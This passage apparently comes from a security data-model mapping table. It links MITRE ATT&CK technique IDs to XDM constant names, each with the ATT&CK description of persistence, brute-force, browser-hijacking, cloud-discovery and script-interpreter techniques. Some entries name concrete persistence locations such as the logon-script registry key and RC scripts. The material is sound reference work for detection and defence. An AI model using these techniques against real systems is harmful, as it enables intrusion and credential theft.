logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike
[Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root
user.(Citation: creating login hook) Adversaries may use these login hooks to maintain persistence on a
single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to
insert additional malicious code. There can only be one login hook at a time though and depending on the
access configuration of the hooks, either local credentials or an administrator account may be necessary.
https://attack.mitre.org/techniques/T1037/002

T1037.001 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS_LOGON_SCRIPT_WINDOWS Adversaries may use Windows logon scripts automatically executed at logon initialization to establish
persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a
system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the
HKCU\Environment\UserInitMprLogonScript Registry key.(Citation: Hexacorn Logon Scripts)
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access
configuration of the logon scripts, either local credentials or an administrator account may be necessary.
https://attack.mitre.org/techniques/T1037/001

T1037.003 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS_NETWORK_LOGON_SCRIPT Adversaries may use network logon scripts automatically executed at logon initialization to establish
persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.
(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned
to. Depending on the systems within the network, initializing one of these scripts could apply to more than
one or potentially all systems. Adversaries may use these scripts to maintain persistence on a network.
Depending on the access configuration of the logon scripts, either local credentials or an administrator
account may be necessary. https://attack.mitre.org/techniques/T1037/003

T1037.004 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS_RC_SCRIPTS Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like
system’s startup. These files allow system administrators to map and start custom services at startup for
different run levels. RC scripts require root privileges to modify. Adversaries can establish persistence by
adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific
to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map
2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. Adversary
abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as
default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) Several Unix-like systems have
moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS
in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco
Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and
earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To
maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist
with the correct file permissions.(Citation: Ubuntu Manpage systemd rc) https://attack.mitre.org/techniques/
T1037/004

T1037.005 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS_STARTUP_ITEMS Adversaries may use startup items automatically executed at boot initialization to establish persistence.
Startup items execute during the final phase of the boot process and contain shell scripts or other
executable files along with configuration information used by the system to determine the execution order
for all startup items. (Citation: Startup Items) This is technically a deprecated technology (superseded by
[Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /
Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by
default on macOS Sierra. A startup item is a directory whose executable and configuration property list
(plist), StartupParameters.plist, reside in the top-level directory. An adversary can create the
appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation:
Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of
macOS, they will run as the elevated root user. https://attack.mitre.org/techniques/T1037/005

T1217 XDM_CONST.MITRE_TECHNIQUE_BROWSER_BOOKMARK_DISCOVERY Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser
bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as
well as details about internal network resources such as servers, tools/dashboards, or other related
infrastructure. Browser bookmarks may also highlight additional targets after an adversary has access to
valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated
with logins cached by a browser. Specific storage locations vary based on platform and/or application, but
browser bookmarks are typically stored in local files/databases. https://attack.mitre.org/techniques/T1217

T1176 XDM_CONST.MITRE_TECHNIQUE_BROWSER_EXTENSIONS Adversaries may abuse Internet browser extensions to establish persistent access to victim systems.
Browser extensions or plugins are small programs that can add functionality and customize aspects of
Internet browsers. They can be installed directly or through a browser's app store and generally have
access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)
(Citation: Chrome Extensions Definition) Malicious extensions can be installed into a browser through
malicious app store downloads masquerading as legitimate extensions, through social engineering, or by
an adversary that has already compromised a system. Security can be limited on browser app stores so it
may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome
Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url
to install updates from an adversary controlled server or manipulate the mobile configuration file to silently
install additional extensions. Previous to macOS 11, adversaries could silently install browser extensions
via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the
use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be
planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) Once the extension
is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)
(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including
credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome
Extension) and be used as an installer for a RAT for persistence. There have also been instances of
botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet)
There have also been similar examples of extensions being used for command & control.(Citation: Chrome
Extension C2 Malware) https://attack.mitre.org/techniques/T1176
Original Mapped Description

T1185 XDM_CONST.MITRE_TECHNIQUE_BROWSER_SESSION_HIJACKING Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to
change content, modify user-behaviors, and intercept information as part of various browser session
hijacking techniques.(Citation: Wikipedia Man in the Browser) A specific example is when an adversary
injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client
certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt
Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as
pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/
administrator rights. Another example involves pivoting browser traffic from the adversary's browser through
the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic
in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary
assumes the security context of whichever browser process the proxy is injected into. Browsers typically
create a new process for each tab that is opened and permissions and certificates are separated
accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet,
such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through
the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security
provided by 2-factor authentication.(Citation: cobaltstrike manual) https://attack.mitre.org/techniques/T1185

T1110 XDM_CONST.MITRE_TECHNIQUE_BRUTE_FORCE Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or
when password hashes are obtained. Without knowledge of the password for an account or set of
accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.
Brute forcing passwords can take place via interaction with a service that will check the validity of those
credentials or offline against previously acquired credential data, such as password hashes. Brute forcing
credentials may take place at various points during a breach. For example, adversaries may attempt to
brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim
environment leveraging knowledge gathered from other post-compromise behaviors such as [OS
Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://
attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/
T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote
Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access. https://attack.mitre.org/
techniques/T1110

T1110.004 XDM_CONST.MITRE_TECHNIQUE_BRUTE_FORCE_CREDENTIAL_STUFFING Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to
target accounts through credential overlap. Occasionally, large numbers of username and password pairs
are dumped online when a website or service is compromised and the user account credentials accessed.
The information may be useful to an adversary attempting to compromise accounts by taking advantage of
the tendency for users to use the same passwords across personal and business accounts. Credential
stuffing is a risky option because it could cause numerous authentication failures and account lockouts,
depending on the organization's login failure policies. Typically, management services over commonly used
ports are used when stuffing credentials. Commonly targeted services include the following: * SSH (22/
TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/
TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/
TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In
addition to management services, adversaries may "target single sign-on (SSO) and cloud-based
applications utilizing federated authentication protocols," as well as externally facing email applications,
such as Office 365.(Citation: US-CERT TA18-068A 2018) https://attack.mitre.org/techniques/T1110/004

T1110.002 XDM_CONST.MITRE_TECHNIQUE_BRUTE_FORCE_PASSWORD_CRACKING Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext
passwords, when credential material such as password hashes are obtained. [OS Credential Dumping]
(https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an
adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option.
Techniques to systematically guess the passwords used to compute hashes are available, or the adversary
may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-
controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting
plaintext password resulting from a successfully cracked hash may be used to log into systems, resources,
and services in which the account has access. https://attack.mitre.org/techniques/T1110/002

T1110.001 XDM_CONST.MITRE_TECHNIQUE_BRUTE_FORCE_PASSWORD_GUESSING Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess
passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary
may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may
guess login credentials without prior knowledge of system or environment passwords during an operation
by using a list of common passwords. Password guessing may or may not take into account the target's
policies on password complexity or use policies that may lock accounts out after a number of failed
attempts. Guessing passwords can be a risky option because it could cause numerous authentication
failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance
Cleaver) Typically, management services over commonly used ports are used when guessing passwords.
Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) *
NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal
Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) *
Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In addition to management services,
adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated
authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-
CERT TA18-068A 2018) In default environments, LDAP and Kerberos connection attempts are less likely to
trigger events over SMB, which creates Windows "logon failure" event ID 4625. https://attack.mitre.org/
techniques/T1110/001

T1110.003 XDM_CONST.MITRE_TECHNIQUE_BRUTE_FORCE_PASSWORD_SPRAYING Adversaries may use a single or small list of commonly used passwords against many different accounts to
attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or
a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are
attempted with that password against many different accounts on a network to avoid account lockouts that
would normally occur when brute forcing a single account with many passwords. (Citation:
BlackHillsInfosec Password Spraying) Typically, management services over commonly used ports are used
when password spraying. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/
TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/
TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) *
MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In addition to
management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing
federated authentication protocols," as well as externally facing email applications, such as Office 365.
(Citation: US-CERT TA18-068A 2018) In default environments, LDAP and Kerberos connection attempts
are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625. https://
attack.mitre.org/techniques/T1110/003

T1612 XDM_CONST.MITRE_TECHNIQUE_BUILD_IMAGE_ON_HOST Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval
of malicious images from a public registry. A remote build request may be sent to the Docker API that
includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then
builds a custom image upon it.(Citation: Docker Build Image) An adversary may take advantage of that
build API to build a custom image on the host that includes malware downloaded from their C2 server, and
then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom
image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June
2021) If the base image is pulled from a public registry, defenses will likely not detect the image as
malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be
considered even less suspicious since the image is already in the environment. https://attack.mitre.org/
techniques/T1612

T1115 XDM_CONST.MITRE_TECHNIQUE_CLIPBOARD_DATA Adversaries may collect data stored in the clipboard from users copying information within or between
applications. In Windows, Applications can access clipboard data by using the Windows API.(Citation:
MSDN Clipboard) OSX provides a native command, pbpaste, to grab clipboard contents.(Citation:
Operating with EmPyre) https://attack.mitre.org/techniques/T1115
Original Mapped Description

T1580 XDM_CONST.MITRE_TECHNIQUE_CLOUD_INFRASTRUCTURE_DISCOVERY An adversary may attempt to discover resources that are available within an infrastructure-as-a-service
(IaaS) environment. This includes compute service resources such as instances, virtual machines, and
snapshots as well as resources of other services including the storage and database services. Cloud
providers offer methods such as APIs and commands issued through CLIs to serve information about
infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can
return information about one or more instances within an account, the ListBuckets API that returns a list
of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to
retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon
Describe Instances API)(Citation: AWS Get Public Access Block). Similarly, GCP's Cloud SDK CLI provides
the gcloud compute instances list command to list all Google Compute Engine instances in a project
(Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual
machines.(Citation: Microsoft AZ CLI) An adversary may enumerate resources using a compromised user's
access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of
these available resources may help adversaries determine their next steps in the Cloud environment, such
as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information
to change the configuration to make the bucket publicly accessible, allowing data to be accessed without
authentication. Adversaries have also may use infrastructure discovery APIs such as
DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources.
(Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential
value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery]
(https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the
provided services rather than the services themselves. https://attack.mitre.org/techniques/T1580

T1538 XDM_CONST.MITRE_TECHNIQUE_CLOUD_SERVICE_DASHBOARD An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information
from an operational cloud environment, such as specific services, resources, and features. For example,
the GCP Command Center can be used to view all assets, findings of potential security risks, and to run
additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center
Dashboard) Depending on the configuration of the environment, an adversary may be able to enumerate
more information via the graphical dashboard than an API. This allows the adversary to gain information
without making any API requests. https://attack.mitre.org/techniques/T1538

T1526 XDM_CONST.MITRE_TECHNIQUE_CLOUD_SERVICE_DISCOVERY An adversary may attempt to enumerate the cloud services running on a system after gaining access.
These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or
software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include
Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. Adversaries
may attempt to discover information about the services enabled throughout the environment. Azure tools
and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources
and services, including applications, management groups, resources and policy definitions, and their
relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure
AD Graph API) Stormspotter is an open source tool for enumerating and constructing a graph for Azure
resources and services, and Pacu is an open source AWS exploitation framework that supports several
methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu) https://
attack.mitre.org/techniques/T1526

T1619 XDM_CONST.MITRE_TECHNIQUE_CLOUD_STORAGE_OBJECT_DISCOVERY Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information
during automated discovery to shape follow-on behaviors, including requesting all or specific objects from
cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local
host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://
attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud
infrastructure. Cloud service providers offer APIs allowing users to enumerate objects stored within cloud
storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation:
List Blobs) . https://attack.mitre.org/techniques/T1619

T1059 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These
interfaces and languages provide ways of interacting with computer systems and are a common feature
across many different platforms. Most systems come with some built-in command-line interface and
scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://
attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell]
(https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/
T1059/001). There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/
T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://
attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands.
Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001)
payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing
C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various
[Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.
(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command
History)(Citation: Remote Shell Execution in Python) https://attack.mitre.org/techniques/T1059

T1059.002 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_APPLESCRIPT Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to
control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple
AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript.
These events can locate open windows, send keystrokes, and interact with almost any open application
locally or remotely. Scripts can be run from the command-line via osascript /path/to/script or
osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways
including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as
plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne
AppleScript) AppleScripts do not need to call osascript to execute, however. They may be executed from
within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/
T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/
osascript command line utility. Adversaries may abuse AppleScript to execute various behaviors, such as
interacting with an open SSH connection, moving to remote machines, and even presenting users with fake
dialog boxes. These events cannot start applications remotely (they can start them locally), but they can
interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher,
AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which
otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne
macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques
as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro
Malware Targets Macs) https://attack.mitre.org/techniques/T1059/002

T1059.007 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_JAVASCRIPT Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-
independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in
webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the
Windows Script engine and thus integrated with many components of Windows such as the [Component
Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA)
pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)
JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of
Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides
scripting capabilities to control applications, interface with the operating system, and bridge access into the
rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript]
(https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility
osascript, they can be compiled into applications or script files via osacompile, and they can be compiled
and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About
Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation:
Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode) Adversaries may abuse
various implementations of JavaScript to execute various behaviors. Common uses include hosting
malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)
or downloading and executing these script files as secondary payloads. Since these payloads are text-
based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or
Information](https://attack.mitre.org/techniques/T1027). https://attack.mitre.org/techniques/T1059/007
Original Mapped Description

T1059.008 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_NETWORK_DEVICE_CLI Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute
malicious command and payloads. The CLI is the primary means through which users and administrators
interact with the device in order to view system information, modify device operations, or perform diagnostic
and administrative functions. CLIs typically contain various permission levels required for different
commands. Scripting interpreters automate tasks and extend functionality beyond the command set
included in the network OS. The CLI and scripting interpreter are accessible through a direct console
connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/
T1021/004). Adversaries can use the network CLI to change how network devices behave and operate.
The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup
configuration parameters to load malicious system software, or to disable security features or logging to
avoid detection. (Citation: Cisco Synful Knock Evolution) https://attack.mitre.org/techniques/T1059/008

T1059.001 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_POWERSHELL Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful
interactive command-line interface and scripting environment included in the Windows operating system.
(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including
discovery of information and execution of code. Examples include the Start-Process cmdlet which can be
used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote
computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed
from disk or in memory without touching disk. A number of PowerShell-based offensive testing tools are
available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/
software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github
PSAttack) PowerShell commands/scripts can also be executed without directly invoking the
powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation
assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).
(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft
PSfromCsharp APR 2014) https://attack.mitre.org/techniques/T1059/001

T1059.006 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_PYTHON Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/
programming language, with capabilities to perform many functions. Python can be executed interactively
from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and
distributed to different systems. Python code can also be compiled into binary executables. Python comes
with many built-in packages to interact with the underlying system, such as file operations and device I/O.
Adversaries can use these libraries to download and execute commands or other scripts as well as perform
various malicious behaviors. https://attack.mitre.org/techniques/T1059/006

T1059.004 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_UNIX_SHELL Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary
command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh,
bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell)
Unix shells can control every aspect of a system, with certain commands requiring elevated privileges. Unix
shells also support scripts that enable sequential execution of commands as well as other typical
programming operations such as conditionals and loops. Common uses of shell scripts include long or
repetitive tasks, or the need to run the same set of commands on multiple systems. Adversaries may abuse
Unix shells to execute various commands or payloads. Interactive shells may be accessed through
command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/
techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple
commands on victims or as part of payloads used for persistence. https://attack.mitre.org/techniques/
T1059/004

T1059.005 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_VISUAL_BASIC Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by
Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://
attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106)
through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated
and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)
(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic
for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft
Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA
enables documents to contain macros used to automate the execution of tasks and other functionality on
the host. VBScript is a default scripting language on Windows hosts and can also be used in place of
[JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served
to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft
VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage
includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing
Attachment](https://attack.mitre.org/techniques/T1566/001) payloads. https://attack.mitre.org/techniques/
T1059/005

T1059.003 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_WINDOWS_COMMAND_SHELL Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd]
(https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The
Windows command prompt can be used to control almost any aspect of a system, with various permission
levels required for different subsets of commands. The command prompt can be invoked remotely via
[Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/
techniques/T1021/004).(Citation: SSH in Windows) Batch files (ex: .bat or .cmd) also provide the shell with
a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.
Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands
on multiple systems. Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute
various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to
execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with
input and output forwarded over a command and control channel. https://attack.mitre.org/techniques/
T1059/003

T1092 XDM_CONST.MITRE_TECHNIQUE_COMMUNICATION_THROUGH_REMOVABLE_MEDIA Adversaries can perform command and control between compromised hosts on potentially disconnected
networks using removable media to transfer commands from system to system. Both systems would need
to be compromised, with the likelihood that an Internet-connected system was compromised first and the
second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/
techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-
